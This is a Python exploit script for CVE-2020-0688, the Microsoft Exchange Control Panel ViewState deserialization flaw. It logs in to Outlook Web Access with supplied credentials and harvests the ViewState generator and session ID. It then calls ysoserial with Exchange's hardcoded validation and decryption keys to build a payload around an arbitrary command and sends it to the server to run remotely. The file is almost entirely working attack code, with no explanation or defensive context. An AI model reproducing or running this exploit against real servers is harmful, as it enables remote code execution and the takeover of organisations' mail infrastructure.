CVE-2020-0688_EXP.py

# encoding: UTF-8
import requests
import readline
import argparse
import re
import sys
import os
import urllib3
from urllib.parse import urlparse
from urllib.parse import quote
urllib3.disable_warnings()

ysoserial_path = os.path.abspath(os.path.dirname(__file__))+"/ysoserial-1.32/"
session = requests.Session()

def get_value(url, user, pwd):
    print("[*] Tring to login owa...")
    tmp = urlparse(url)
    base_url = "{}://{}".format(tmp.scheme, tmp.netloc)
    paramsPost = {"password": ""+pwd+"", "isUtf8": "1", "passwordText": "", "trusted": "4",
                "destination": ""+url+"", "flags": "4", "forcedownlevel": "0", "username": ""+user+""}
    headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Upgrade-Insecure-Requests": "1",
            "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0", "Connection": "close", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Cookie": "PrivateComputer=true; PBack=0"}
    cookies = {"PBack": "0", "PrivateComputer": "true"}
    login_url = base_url + '/owa/auth.owa'
    print("[+] Login url: {}".format(login_url))
    try:
        login = session.post(login_url, data=paramsPost,
                          headers=headers, verify=False, timeout=30)
        print("[*] Status code: %i" % login.status_code)
        if "reason=" in login.text or "reason=" in login.url and "owaLoading" in login.text:
            print("[!] Login Incorrect, please try again with a different account..")
            # sys.exit(1)
        #print(str(response.text))
    except Exception as e:
        print("[!] login error , error: {}".format(e))
        sys.exit(1)
    print("[+] Login successfully! ")
    try:
        print("[*] Tring to get __VIEWSTATEGENERATOR...")
        target_url = "{}/ecp/default.aspx".format(base_url)
        new_response = session.get(target_url, verify=False, timeout=15)
        view = re.compile(
            'id="__VIEWSTATEGENERATOR" value="(.+?)"').findall(str(new_response.text))[0]
        print("[+] Done! __VIEWSTATEGENERATOR:{}".format(view))
    except:
        view = "B97B4E27"
        print("[*] Can't get __VIEWSTATEGENERATOR, use default value: {}".format(view))
    try:
        print("[*] Tring to get ASP.NET_SessionId....")
        key = session.cookies['ASP.NET_SessionId']
        print("[+] Done!  ASP.NET_SessionId: {}".format(key))
    except Exception as e:
        key = None
        print("[!] Get ASP.NET_SessionId error, error: {} \n[*] Exit..".format(e)) 
    return view, key, base_url

def ysoserial(cmd):
    cmd = ysoserial_path+cmd
    r = os.popen(cmd)
    res = r.readlines()
    return res[-1]

def main():
    parser = argparse.ArgumentParser()
    parser.add_argument("-s", "--server", required=True, help="ECP Server URL Example: http://ip/owa")
    parser.add_argument("-u", "--user", required=True, help="login account Example: domain\\user")
    parser.add_argument("-p", "--password", required=True, help="Password")
    parser.add_argument("-c", "--cmd", help="Command u want to execute", required=True)
    parser.add_argument("-e", "--encrypt", help="Encrypt the payload", action='store_true',default=False)
    args = parser.parse_args()
    url = args.server
    print("[*] Start to exploit..")
    user = args.user
    pwd = args.password
    command = args.cmd
    view, key, base_url = get_value(url, user, pwd)
    if key is None:
        key = 'test'
        sys.exit(1)
    ex_payload = """ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "{}" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="{}" --viewstateuserkey="{}" --islegacy """.format(command,view,key)
    if args.encrypt:
        re_payload = ex_payload + ' --decryptionalg="3DES" --decryptionkey="E9D2490BD0075B51D1BA5288514514AF" --isencrypted'
    else:
        re_payload = ex_payload + " --isdebug"
    print("\n"+re_payload)
    out_payload = ysoserial(re_payload)
    if args.encrypt:
        final_exp = "{}/ecp/default.aspx?__VIEWSTATEENCRYPTED=&__VIEWSTATE={}".format(base_url, quote(out_payload))
    else:
        final_exp = "{}/ecp/default.aspx?__VIEWSTATEGENERATOR={}&__VIEWSTATE={}".format(base_url, view, quote(out_payload))
    print("\n[+] Exp url: {}".format(final_exp))
    print("\n[*] Auto trigger payload..")
    status = session.get(final_exp,verify=False,timeout=15)
    if status.status_code==500:
        print("[*] Status code: %i, Maybe success!" % status.status_code)

if __name__ == "__main__":
    main()